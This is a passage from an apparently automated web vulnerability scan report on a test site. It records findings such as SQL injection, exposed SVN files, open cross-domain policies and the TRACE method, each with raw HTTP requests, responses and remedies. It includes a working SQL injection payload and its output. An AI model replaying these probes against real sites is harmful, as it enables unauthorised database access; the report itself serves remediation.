Do not trust the data that users supply and don't add it to directly into the template. Instead, pass user controlled parameters to the template as template parameters.

Required Skills for Successful Exploitation

This vulnerability is not difficult to leverage. There are vast resources available for template engines. Successful exploitation requires knowledge of the programming language and syntax of the template engine. Minimal attack skill is enough to exploit vulnerabilities like this one.

External References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API8

CVSS 3.0 SCORE

Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE

Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

6. Database User Has Admin Privileges

HIGH
1
CONFIRMED
1

Acunetix 360 detected the Database User Has Admin Privileges.

This issue has been confirmed by checking the connection privileges via an identified SQL injection vulnerability in the application.

Impact

This can allow an attacker to gain extra privileges via SQL injection attacks. Here is the list of attacks that the attacker might carry out:
  • Gain full access to the database server.
  • Gain a reverse shell to the database server and execute commands on the underlying operating system.
  • Access the database with full permissions, where it may be possible to read, update or delete arbitrary data from the database.
  • Depending on the platform and the database system user, an attacker might carry out a privilege escalation attack to gain administrator access to the target system.

Vulnerabilities

6.1. http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10
CONFIRMED
CONFIRMED
Method Parameter Value
GET id -1 OR 17-7=10
Go to the highlighted output

Request

GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 477.7811
Total Bytes Received : 230
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 12 Nov 2020 07:54:39 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><link type="text/css" href="/Generics/style.css" rel="stylesheet"/>
<body>
<div id="wrapper">

<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">

</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>

<div style="clear: both;">&nbsp;</div>
<div class="entry">
<p>

<h3>Results: -1 OR 17-7=10</h3></br>

<table class="container"><thead><th>ID</th><th>Name</th><th>SURNAME</th><th>CREATION DATE </th></thead><tbody><tr class="odd">
<td>2 </td>
<td>NICK </td>
<td>WAHLBERG </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
<tr class="even">
<td>3 </td>
<td>ED </td>
<td>CHASE </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
<tr class="odd">
<td>4 </td>
<td>JENNIFER </td>
<td>DAVIS </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
<tr class="ev

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:56:41 AM
The Issue was detected during the Scan. System 8/19/2020 11:58:12 AM
The Issue was detected during the Scan. System 7/7/2020 9:54:58 AM
The Issue was detected during the Scan. System 7/6/2020 7:10:04 AM
The Issue was detected during the Scan. System 7/6/2020 6:53:18 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:15:04 PM

Remedy

Create a database user with the least possible permissions for your application and connect to the database with that user. Always follow the principle of providing the least privileges for all users and applications.

External References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

CVSS 3.0 SCORE

Base9 (Critical)
Temporal9 (Critical)
Environmental9 (Critical)

CVSS Vector String

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE

Base9 (Critical)
Temporal9 (Critical)
Environmental9.1 (Critical)

CVSS Vector String

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

7. SVN Detected

HIGH
1

Acunetix 360 discovered an SVN repository file.

Impact

SVN repository files can disclose SVN addresses, SVN usernames, and date information. While disclosures of this type do not provide chances of direct attack, they can be useful for an attacker when combined with other vulnerabilities or during the exploitation of some other vulnerabilities.

Vulnerabilities

7.1. http://php.testsparker.com/.svn/all-wcprops
Method Parameter Value
GET URI-BASED .svn/all-wcprops

Certainty



Go to the highlighted output

Request

GET /.svn/all-wcprops HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 852.6997
Total Bytes Received : 310
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Length: 1134
Last-Modified: Thu, 30 Jul 2020 08:09:20 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Date: Thu, 12 Nov 2020 07:51:58 GMT
ETag: "1900000001b69c-46e-5aba4307c6c00"

K 25
svn:
wc:ra_dav:version-url
V 53
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP
END
nslookup.php
K 25
svn:
wc:ra_dav:version-url
V 66
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/nslookup.php
END
page.php
K 25
svn:
wc:ra_dav:version-url
V 62
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/page.php
END
process.php
K 25
svn:
wc:ra_dav:version-url
V 65
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/process.php
END
style.css
K 25
svn:
wc:ra_dav:version-url
V 63
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/style.css
END
hello.php
K 25
svn:
wc:ra_dav:version-url
V 63
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/hello.php
END
products.php
K 25
svn:
wc:ra_dav:version-url
V 66
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/products.php
END
conf.php
K 25
svn:
wc:ra_dav:version-url
V 62
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/conf.php
END
artist.php
K 25
svn:
wc:ra_dav:version-url
V 64
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/artist.php
END
index.php
K 25
svn:
wc:ra_dav:version-url
V 63
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/index.php
END

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:58 AM
The Issue was detected during the Scan. System 8/19/2020 11:55:19 AM
The Issue was detected during the Scan. System 7/7/2020 9:52:19 AM
The Issue was detected during the Scan. System 7/6/2020 7:06:43 AM
The Issue was detected during the Scan. System 7/6/2020 6:49:14 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:11:34 PM

Remedy

Do not leave SVN repository files on production environments. If there is a business requirement to do so, implement access control mechanisms to stop public access to SVN repository files.

You can also use Export if you do one time deployments, instead of a checkout.

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

CVSS 3.0 SCORE

Base5.3 (Medium)
Temporal5.3 (Medium)
Environmental5.3 (Medium)

CVSS Vector String

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS 3.1 SCORE

Base5.3 (Medium)
Temporal5.3 (Medium)
Environmental5.3 (Medium)

CVSS Vector String

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

8. Open Policy Crossdomain.xml Detected

MEDIUM
1
CONFIRMED
1

Acunetix 360 detected an Open Policy Crossdomain.xml file.

Impact

Open policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.

Vulnerabilities

8.1. http://php.testsparker.com/crossdomain.xml
CONFIRMED
CONFIRMED

Policy Rules

  • <allow-access-from domain="*" />
Go to the highlighted output

Request

GET /crossdomain.xml HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 1534.4765
Total Bytes Received : 314
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Length: 315
Last-Modified: Thu, 30 Jul 2020 08:09:20 GMT
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 12 Nov 2020 07:51:35 GMT
ETag: "1500000001b77a-13b-5aba4307c6c00"

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:34 AM
The Issue was detected during the Scan. System 8/19/2020 11:54:15 AM
The Issue was detected during the Scan. System 7/7/2020 9:51:44 AM
The Issue was detected during the Scan. System 7/6/2020 7:05:44 AM
The Issue was detected during the Scan. System 7/6/2020 6:47:58 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:10:22 PM

Remedy

Configure your Crossdomain.xml to prevent access from everywhere to your domain.

External References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

CVSS 3.0 SCORE

Base6.5 (Medium)
Temporal6.2 (Medium)
Environmental6.2 (Medium)

CVSS Vector String

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C

CVSS 3.1 SCORE

Base6.5 (Medium)
Temporal6.2 (Medium)
Environmental6.2 (Medium)

CVSS Vector String

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C

9. Open Silverlight Client Access Policy

MEDIUM
1
CONFIRMED
1

Acunetix 360 detected an Open Silverlight Client Access Policy file (ClientAccessPolicy.xml).

Impact

The ClientAccessPolicy.xml file allows other Silverlight client services to make HTTP requests to your web server and see its response. This might be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.

Vulnerabilities

9.1. http://php.testsparker.com/clientaccesspolicy.xml
CONFIRMED
CONFIRMED

Policy Rules

  • *
Go to the highlighted output

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 350.4781
Total Bytes Received : 314
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Length: 270
Last-Modified: Thu, 30 Jul 2020 08:09:20 GMT
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 12 Nov 2020 07:51:37 GMT
ETag: "1500000001b778-10e-5aba4307c6c00"

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true"/>
</grant-to>
</cross-domain-access>
</access-policy>

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:35 AM
The Issue was detected during the Scan. System 8/19/2020 11:54:15 AM
The Issue was detected during the Scan. System 7/7/2020 9:51:45 AM
The Issue was detected during the Scan. System 7/6/2020 7:05:45 AM
The Issue was detected during the Scan. System 7/6/2020 6:47:59 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:10:23 PM

Remedy

Configure your ClientAccessPolicy.xml file to prevent access from everywhere outside your domain.

External References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

CVSS 3.0 SCORE

Base6.5 (Medium)
Temporal6.2 (Medium)
Environmental6.2 (Medium)

CVSS Vector String

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C

CVSS 3.1 SCORE

Base6.5 (Medium)
Temporal6.2 (Medium)
Environmental6.2 (Medium)

CVSS Vector String

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C

10. SSL/TLS Not Implemented

MEDIUM
1

Acunetix 360 detected that SSL/TLS is not implemented.

Impact

An attacker who is able to intercept your - or your users' - network traffic can read and modify any messages that are exchanged with your server.

That means that an attacker can see passwords in clear text, modify the appearance of your website, redirect the user to other web pages or steal session information.

Therefore no message you send to the server remains confidential.

Vulnerabilities

10.1. https://php.testsparker.com/

Certainty



Go to the highlighted output

Request

[NETSPARKER] SSL Connection

Response

Response Time (ms) : 1
Total Bytes Received : 27
Body Length : 0
Is Compressed : No
[NETSPARKER] SSL Connection

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:30 AM
The Issue was detected during the Scan. System 8/19/2020 11:54:15 AM
The Issue was detected during the Scan. System 7/7/2020 9:51:44 AM
The Issue was detected during the Scan. System 7/6/2020 7:05:42 AM
The Issue was detected during the Scan. System 7/6/2020 6:47:58 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:10:22 PM

Remedy

We suggest that you implement SSL/TLS properly, for example by using the Certbot tool provided by the Let's Encrypt certificate authority. It can automatically configure most modern web servers, e.g. Apache and Nginx to use SSL/TLS. Both the tool and the certificates are free and are usually installed within minutes.

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

CVSS 3.0 SCORE

Base6.8 (Medium)
Temporal6.1 (Medium)
Environmental6.1 (Medium)

CVSS Vector String

CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C

CVSS 3.1 SCORE

Base6.8 (Medium)
Temporal6.1 (Medium)
Environmental6.1 (Medium)

CVSS Vector String

CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C

11. Cookie Not Marked as HttpOnly

LOW
1
CONFIRMED
1

Acunetix 360 identified a cookie not marked as HTTPOnly.

HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

Impact

During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.

Vulnerabilities

11.1. http://php.testsparker.com/auth/internal.php
CONFIRMED
CONFIRMED

Identified Cookie(s)

Cookie Source

Go to the highlighted output

Request

GET http://php.testsparker.com/auth/internal.php HTTP/1.1
Origin: http://php.testsparker.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
Referer: http://php.testsparker.com/auth/login.php

Response

Response Time (ms) : 0
Total Bytes Received : 361
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Date: Thu, 12 Nov 2020 07:50:57 GMT
Cache-Control: no-store, must-revalidate, no-cache, post-check=0, pre-check=0
content-type: text/html
content-length: 2860


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="style.css" rel="stylesheet" type="text/css" media="screen" />
</head><body>
<div id="wrapper">

<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">

</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h1 class="title"><a href="#">Admin Area</a></h1>
<p>
Hi admin
<br>
<form method="POST" action="/auth/xss.php">
Search For: &nbsp; <input type="text" name="search"/> &nbsp;&nbsp;
<input type="submit" value="SUBMIT">
</form>
<a href="logout.php">LOGOUT</a>
</p>

<div style="clear: both;">&nbsp;</div>
<div class="entry">


</div>
</div>
<div style="clear: both;">&nbsp;</div>
</div>
<!-- end #content -->

<div id="sidebar">
<ul>
<li>
<div id="search" >
<form meth

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:02 AM
The Issue was detected during the Scan. System 8/19/2020 11:53:56 AM
The Issue was detected during the Scan. System 7/7/2020 9:51:21 AM
The Issue was detected during the Scan. System 7/6/2020 7:06:10 AM
The Issue was detected during the Scan. System 7/6/2020 6:47:44 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:09:59 PM

Actions to Take

  1. See the remedy for solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

12. Version Disclosure (Apache)

LOW
1

Acunetix 360 identified a version disclosure (Apache) in the target web server's HTTP response.

This information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.

Vulnerabilities

12.1. http://php.testsparker.com/

Extracted Version

  • 2.2.8

Certainty



Go to the highlighted output

Request

GET / HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 751.1999
Total Bytes Received : 223
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6

X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Length: 136
Content-Type: text/html
Date: Thu, 12 Nov 2020 07:51:19 GMT

<html>
<HEAD>
<SCRIPT language="JavaScript">
<!--
window.location="process.php?file=Generics/index.nsp";
//-->
</SCRIPT>
</HEAD>
</html>

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:27 AM
The Issue was detected during the Scan. System 8/19/2020 11:54:07 AM
The Issue was detected during the Scan. System 7/7/2020 9:51:37 AM
The Issue was detected during the Scan. System 7/6/2020 7:05:35 AM
The Issue was detected during the Scan. System 7/6/2020 6:47:49 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:10:13 PM

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Remedy References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

13. Version Disclosure (PHP)

LOW
1

Acunetix 360 identified a version disclosure (PHP) in the target web server's HTTP response.

This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.

Vulnerabilities

13.1. http://php.testsparker.com/

Extracted Version

  • 5.2.6

Certainty



Go to the highlighted output

Request

GET / HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 751.1999
Total Bytes Received : 223
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6

X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Length: 136
Content-Type: text/html
Date: Thu, 12 Nov 2020 07:51:19 GMT

<html>
<HEAD>
<SCRIPT language="JavaScript">
<!--
window.location="process.php?file=Generics/index.nsp";
//-->
</SCRIPT>
</HEAD>
</html>

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:27 AM
The Issue was detected during the Scan. System 8/19/2020 11:54:07 AM
The Issue was detected during the Scan. System 7/7/2020 9:51:37 AM
The Issue was detected during the Scan. System 7/6/2020 7:05:35 AM
The Issue was detected during the Scan. System 7/6/2020 6:47:50 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:10:14 PM

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

14. Programming Error Message

LOW
1

Acunetix 360 identified a Programming Error Message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. data may be disclosed. Most of these issues will be identified and reported separately by Acunetix 360.

Vulnerabilities

14.1. http://php.testsparker.com/hello.php?name=Visitor
Method Parameter Value
GET name Visitor

Identified Error Message

  • <b>Parse error</b>: syntax error, unexpected T_STRING in <b>C:\AppServ\www\hello.php(24) : eval()'d code</b> on line <b>1</b>

Certainty



Go to the highlighted output

Request

GET /hello.php?name=Visitor HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 1202.4707
Total Bytes Received : 224
Body Length : 0
Is Compressed : No


<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h1 class="title"><a href="#">Hello Service </a></h1>
<p>
Hello Visitor<br />
<b>Parse error</b>: syntax error, unexpected T_STRING in <b>C:\AppServ\www\hello.php(24) : eval()'d code</b> on line <b>1</b><br />
20$str = 20 Visitor;20 </p>

<div style="clear: both;">&nbsp;</div>
<div class="entry">


</div>
</div>
<div style="clear: both;">&nbsp;</div>
</div>
<!-

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:50 AM
The Issue was detected during the Scan. System 8/19/2020 11:54:29 AM
The Issue was detected during the Scan. System 7/7/2020 9:51:52 AM
The Issue was detected during the Scan. System 7/6/2020 7:05:50 AM
The Issue was detected during the Scan. System 7/6/2020 6:48:06 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:10:36 PM

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database, then show this number and a static user-friendly error message to the user.

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

15. Apache MultiViews Enabled

LOW
1

Acunetix 360 detected that Apache MultiViews is enabled.

This vulnerability can be used for locating and obtaining access to some hidden resources.

Impact

An attacker can use this functionality to aid in finding hidden files in the site and potentially gather further sensitive information.

Vulnerabilities

15.1. http://php.testsparker.com/clientaccesspolicy

Certainty



Go to the highlighted output

Request

HEAD /clientaccesspolicy HTTP/1.1
Host: php.testsparker.com
Accept: netsparker/check
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 1238.151
Total Bytes Received : 315
Body Length : 0
Is Compressed : No
HTTP/1.1 406 Not Acceptable
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
TCN: list
Alternates: {"clientaccesspolicy.xml" 1 {type application/xml} {length 270}}
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 Nov 2020 07:51:49 GMT
Vary: negotiate

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:51 AM
The Issue was detected during the Scan. System 8/19/2020 11:54:19 AM
The Issue was detected during the Scan. System 7/7/2020 9:51:46 AM
The Issue was detected during the Scan. System 7/6/2020 7:05:48 AM
The Issue was detected during the Scan. System 7/6/2020 6:48:09 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:10:27 PM

Actions to Take

  1. Change your server configuration file. A recommended configuration for the requested directory should be in the following format:

    <Directory /{YOUR DIRECTORY}>
    	Options FollowSymLinks
    </Directory>
    

    Remove the MultiViews option from configuration.

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API7

16. TRACE/TRACK Method Detected

LOW
1

Acunetix 360 detected the TRACE/TRACK method is allowed.

Impact

It is possible to bypass the HttpOnly cookie limitation and read the cookies in a cross-site scripting attack by using the TRACE/TRACK method within an XmlHttpRequest. This is not possible with modern browsers, so the vulnerability can only be used when targeting users with unpatched and old browsers.

Vulnerabilities

16.1. http://php.testsparker.com/
Method Parameter Value
TRACE URI-BASED

Certainty



Go to the highlighted output

Request

TRACE / HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-NS: N15303061S
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 289.1266
Total Bytes Received : 208
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Type: message/http
Transfer-Encoding: chunked
Date: Thu, 12 Nov 2020 07:51:55 GMT

TRACE / HTTP/1.1
Host: php.testsparker.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, image/apng, */*; q=0.8
Accept-Language: en-us, en; q=0.5
Cache-Control: no-cache
X-NS: N15303061S
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Content-Length: 0

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:51:54 AM
The Issue was detected during the Scan. System 8/19/2020 11:55:19 AM
The Issue was detected during the Scan. System 7/7/2020 9:52:18 AM
The Issue was detected during the Scan. System 7/6/2020 7:06:42 AM
